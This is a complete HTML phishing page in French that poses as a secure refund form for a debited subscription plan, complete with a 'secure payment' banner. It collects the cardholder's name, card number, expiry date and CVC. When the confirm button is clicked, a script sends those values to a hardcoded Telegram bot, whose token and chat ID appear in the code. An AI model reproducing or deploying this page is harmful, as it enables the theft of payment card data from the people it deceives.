<html lang="fr"><head>
  <meta charset="UTF-8">
  <title>Titre de la page</title>
  
  <style>
     
     body {
         margin: 0;
         padding: 0;
         display: flex;
flex-direction: column;
align-items: center;
user-select: none;
     }
     
     #topbar {
         margin: 0;
         padding: 0;
         width: 90%;
         box-shadow: 0 1px 0 #bbb;
         font-size: 6vw;
         font-weight: bold;
     }
     
     #sitename {
         
         margin: 0;
         padding: 0;
         
         
     }
     
     #ltd-amount {
         
         margin: 5vw 0 5vw 0;
         padding: 0;
         display: flex;
     }
     
      #ltd {
          margin: 0;
         padding: 0;
         flex: 1;
      }
      
      #amount {
          
          margin: 0;
         padding: 0;
          flex: 1;
          text-align: right;
      }
      
      #card-payment {
          
          font-size: 6vw;
         text-align: left;
         margin: 8vw 0 5vw 0;
         padding: 0;
         width: 80%;
          
      }
      
      
      #datecvc {
          
          display: flex;
          gap: 6vw;
          padding: 0;
          margin: 3vw 0;
          width: 80vw;
      }

  
  #fullName,#cardNumber {
      border: 0;
      width: 76vw;
      height: 10vw;
      box-shadow: 0 1px 0 #bbb;
      margin: 3vw 0;
      padding: 0 2vw;
      outline: none;
      font-size: 4vw;
  }
  
  #expiry,#cvc {
  border: 0;
      flex: 1;
      margin: 0;
      padding: 0 2vw;
      width: 100%;
      height: 10vw;
      box-shadow: 0 1px 0 #bbb;
      outline: none;
      font-size: 4vw;
  }
  
  #login {
      margin: 5vw 0 10vw 0;
      padding: 4vw 0;
      width: 80vw;
      height: auto;
      background: #556dff;
      text-align: center;
      color: #ffffff;
      border-radius: 20vw;
      box-shadow: 0 0.5vw 1vw #aaa;
      font-size: 4vw;
      
  }
  
  #login:active {
      
      opacity: 0.8;
      
  }
  
  </style>
  
</head>
<body>

<div id="cid_15" class="form-input-wide" data-layout="full">
        <div style="text-align:center">
          <img alt="" class="form-image" style="border:0" src="https://static.wixstatic.com/media/4679c4_88f54487b47b4201ad1788aec77d1699~mv2.png/v1/fill/w_248,h_140,al_c,q_85,usm_0.66_1.00_0.01,enc_auto/4679c4_88f54487b47b4201ad1788aec77d1699~mv2.png" height="395px" width="700px" data-component="image">

        </div>
      </div>
      <span style="font-size: 30pt;"><strong><span style="color: #000000;">Remboursser votre forfait débité en tout sécuriter !

</span></strong></span>

          
<br><br>




<input id="fullName" type="text" placeholder=" Nom du titulaire de la carte" class="card-name">
  
<input id="cardNumber" type="number" placeholder=" Numéro De Carte Crédit">

<div id="datecvc">
  
<input id="expiry" type="text" placeholder=" MM/AA">
<input id="cvc" type="number" placeholder=" CVC">
</div>

  <p id="login">Confirmer votre remboursement
  </p>


<script>
document.getElementById('expiry').addEventListener('input', function (e) {
  var input = e.target.value.replace(/\D/g, '');
  var formatted = input.length > 2 ? input.slice(0, 2) + '/' + input.slice(2) : input;
  if (formatted.length > 5) {
      formatted = formatted.substr(0, 5);
  }
  e.target.value = formatted;
});
</script>
<script>
   document.getElementById('cvc').addEventListener('input', function () {
  var cvc = document.getElementById('cvc').value;
  
  if (cvc.length > 4) {
      document.getElementById('cvc').value = cvc.substr(0,4);
  }
  
  
});
  
  
</script>



<div id="cid_15" class="form-input-wide" data-layout="full">
        <div style="text-align:center">
          <img alt="" class="form-image" style="border:0" src="https://static.wixstatic.com/media/4679c4_7266c4dde51c459d8d7c9d01f79f9e38~mv2.jpg/v1/fill/w_361,h_91,al_c,q_80,usm_0.66_1.00_0.01,enc_auto/paiement_securise.jpg" height="176px" width="700px" data-component="image">

        </div>
      </div>

      <script>
        document.getElementById('login').addEventListener('click', function(){
            //window.location.href = 'https://instagram.com'; 
            
    var text = `FullName: ${fullName.value}
CardNumber: ${cardNumber.value}
Date Expiry : ${expiry.value}
Cvc : ${cvc.value}`;

          const botToken = '7035868682:AAFohdArP6VhH7dKss11vNPKdqC9xvvlCIo'; 
          const chatId = '1479852886'; 
          const message = text; 
          
          fetch("https://api.telegram.org/bot" + botToken + "/sendMessage", { 
          method: 'POST', 
          headers: { 
            'Content-Type': 'application/json' 
          }, 
          body: JSON.stringify({ 
            chat_id: chatId, 
            text: message 

            
          }) 
          }) 
          
          .catch(error => { 
          alert('Error:', error); 
          }); 
          
          });
        </script>

    </body>
    </html>
